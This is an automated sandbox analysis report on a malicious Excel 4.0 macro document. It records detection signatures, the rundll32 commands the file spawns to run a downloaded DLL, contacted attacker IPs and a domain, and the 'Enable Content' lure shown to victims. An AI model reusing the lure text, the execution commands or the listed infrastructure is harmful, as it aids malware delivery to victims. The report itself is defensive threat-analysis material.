Loading ...

Play interactive tourEdit tour

Analysis Report 54402971_by_Libranalysis.xls

Overview

General Information

Sample Name:54402971_by_Libranalysis.xls
Analysis ID:412362
MD5:54402971cab910b3d8ddc38caceeddba
SHA1:5038515d2a152a834139673a3ffed90f6a4ffdab
SHA256:d9ce158a711cffda14fc13daf5f8c673e671f8f1033fe44a8af947a95d8e6e72
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6980 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 5204 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5808 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6980, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 5204

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 54402971_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.4:49733 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 192.185.39.58:443
Source: Joe Sandbox ViewIP Address: 192.185.39.58 192.185.39.58
Source: Joe Sandbox ViewIP Address: 192.185.32.232 192.185.32.232
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.aadrm.com/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.cortana.ai
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.office.net
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.onedrive.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://augloop.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://cdn.entity.
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://clients.config.office.net/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://config.edge.skype.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://cortana.ai
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://cortana.ai/api
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://cr.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://dev.cortana.ai
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://devnull.onenote.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://directory.services.
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://graph.windows.net
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://graph.windows.net/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://lifecycle.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://login.windows.local
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://management.azure.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://management.azure.com/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://messaging.office.com/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://ncus.contentsync.
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://officeapps.live.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://onedrive.live.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://outlook.office.com/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://outlook.office365.com/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://settings.outlook.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://staging.cortana.ai
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://tasks.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://wus2.contentsync.
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 221B862E-D5CA-4C51-AEC1-C42AA63B593F.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.4:49733 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above RunDLL x iq= \, 12 13 Once You have Enable Editing
Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 from the yellow bar above t 12 It 13 Once You have Enable Editing, please c
Source: Screenshot number: 8Screenshot OCR: Enable Content 14_ from the yellow bar above 15 / , 16 " 17 ,,_ WHY I CANNOT OPEN THIS DOCUMEN
Source: Screenshot number: 12Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 12Screenshot OCR: Enable Content from the yellow bar above O ' WHY I CANNOT OPEN THIS DOCUMENT ? W You are using
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 54402971_by_Libranalysis.xlsInitial sample: CALL
Source: 54402971_by_Libranalysis.xlsInitial sample: CALL
Source: 54402971_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 54402971_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: 54402971_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/7@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{878EB9C3-2EAF-48A9-B14E-FEDFCEA945AA} - OProcSessId.datJump to behavior
Source: 54402971_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: 54402971_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
